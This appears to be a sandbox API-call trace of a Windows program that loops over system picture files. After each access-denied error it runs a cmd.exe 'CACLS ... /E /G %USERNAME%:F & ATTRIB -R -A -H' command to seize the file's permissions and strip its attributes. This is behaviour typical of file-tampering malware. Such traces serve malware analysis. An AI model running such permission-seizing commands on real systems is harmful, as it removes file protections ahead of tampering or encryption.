CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0182.271] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0182.271] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xcb0, dwThreadId=0x51c)) returned 1 [0182.275] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0182.494] CloseHandle (hObject=0x1b4) returned 1 [0182.494] CloseHandle (hObject=0x120) returned 1 [0182.495] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.495] ReleaseMutex (hMutex=0xf8) returned 1 [0182.495] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.495] ReleaseMutex (hMutex=0xf8) returned 1 [0182.495] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.497] ReleaseMutex (hMutex=0xf8) returned 1 [0182.497] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.497] ReleaseMutex (hMutex=0xf8) returned 1 [0182.497] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile16.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.497] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile16.bmp", lpFilePart=0x12eab4*="usertile16.bmp") returned 0x52 [0182.497] GetLastError () returned 0x5 [0182.497] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0182.497] LocalFree (hMem=0x1c6cc8) returned 0x0 [0182.498] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0182.498] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0182.498] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.498] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.498] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0182.498] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0182.498] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0182.498] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.498] ReleaseMutex (hMutex=0xf8) returned 1 [0182.498] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.498] ReleaseMutex (hMutex=0xf8) returned 1 [0182.498] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.498] ReleaseMutex (hMutex=0xf8) returned 1 [0182.498] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.498] ReleaseMutex (hMutex=0xf8) returned 1 [0182.498] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.499] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp", lpFilePart=0x12eab4*="usertile17.bmp") returned 0x52 [0182.499] GetLastError () returned 0x5 [0182.499] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0182.499] LocalFree (hMem=0x1c6cc8) returned 0x0 [0182.499] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0182.499] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0182.499] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.499] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.499] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0182.499] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0182.499] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xc54, dwThreadId=0xa20)) returned 1 [0182.502] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0182.919] CloseHandle (hObject=0x1b4) returned 1 [0182.919] CloseHandle (hObject=0x120) returned 1 [0182.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.919] ReleaseMutex (hMutex=0xf8) returned 1 [0182.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.919] ReleaseMutex (hMutex=0xf8) returned 1 [0182.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.919] ReleaseMutex (hMutex=0xf8) returned 1 [0182.919] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.919] ReleaseMutex (hMutex=0xf8) returned 1 [0182.919] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile17.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.919] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile17.bmp", lpFilePart=0x12eab4*="usertile17.bmp") returned 0x52 [0182.919] GetLastError () returned 0x5 [0182.920] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0182.920] LocalFree (hMem=0x1c6cc8) returned 0x0 [0182.920] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0182.920] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0182.920] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.920] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.920] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0182.920] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0182.920] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0182.920] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.920] ReleaseMutex (hMutex=0xf8) returned 1 [0182.920] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.920] ReleaseMutex (hMutex=0xf8) returned 1 [0182.920] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.920] ReleaseMutex (hMutex=0xf8) returned 1 [0182.920] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0182.920] ReleaseMutex (hMutex=0xf8) returned 1 [0182.920] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0182.920] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp", lpFilePart=0x12eab4*="usertile18.bmp") returned 0x52 [0182.921] GetLastError () returned 0x5 [0182.921] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0182.921] LocalFree (hMem=0x1c6cc8) returned 0x0 [0182.921] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0182.921] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0182.921] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.921] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0182.921] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0182.921] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0182.921] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xd9c, dwThreadId=0x394)) returned 1 [0182.922] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0183.097] CloseHandle (hObject=0x1b4) returned 1 [0183.097] CloseHandle (hObject=0x120) returned 1 [0183.097] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.097] ReleaseMutex (hMutex=0xf8) returned 1 [0183.097] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.098] ReleaseMutex (hMutex=0xf8) returned 1 [0183.098] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.098] ReleaseMutex (hMutex=0xf8) returned 1 [0183.098] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.098] ReleaseMutex (hMutex=0xf8) returned 1 [0183.098] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile18.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.098] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile18.bmp", lpFilePart=0x12eab4*="usertile18.bmp") returned 0x52 [0183.098] GetLastError () returned 0x5 [0183.098] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0183.098] LocalFree (hMem=0x1c6cc8) returned 0x0 [0183.098] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0183.098] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0183.098] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.098] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.098] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0183.098] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0183.098] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0183.099] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.099] ReleaseMutex (hMutex=0xf8) returned 1 [0183.099] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.099] ReleaseMutex (hMutex=0xf8) returned 1 [0183.099] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.099] ReleaseMutex (hMutex=0xf8) returned 1 [0183.099] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.099] ReleaseMutex (hMutex=0xf8) returned 1 [0183.099] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.100] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp", lpFilePart=0x12eab4*="usertile19.bmp") returned 0x52 [0183.100] GetLastError () returned 0x5 [0183.100] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0183.100] LocalFree (hMem=0x1c6cc8) returned 0x0 [0183.100] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0183.100] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0183.100] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.100] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.100] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0183.100] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0183.100] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xe58, dwThreadId=0xee0)) returned 1 [0183.105] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0183.649] CloseHandle (hObject=0x1b4) returned 1 [0183.649] CloseHandle (hObject=0x120) returned 1 [0183.649] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.649] ReleaseMutex (hMutex=0xf8) returned 1 [0183.649] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.649] ReleaseMutex (hMutex=0xf8) returned 1 [0183.649] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.649] ReleaseMutex (hMutex=0xf8) returned 1 [0183.649] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.649] ReleaseMutex (hMutex=0xf8) returned 1 [0183.649] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile19.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.649] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile19.bmp", lpFilePart=0x12eab4*="usertile19.bmp") returned 0x52 [0183.649] GetLastError () returned 0x5 [0183.649] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0183.650] LocalFree (hMem=0x1c6cc8) returned 0x0 [0183.650] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0183.650] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0183.650] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.650] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0183.650] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0183.650] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0183.650] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount2=68) returned 2 [0183.650] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.650] ReleaseMutex (hMutex=0xf8) returned 1 [0183.650] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.650] ReleaseMutex (hMutex=0xf8) returned 1 [0183.650] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0183.650] ReleaseMutex (hMutex=0xf8) returned 1 [0183.650] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 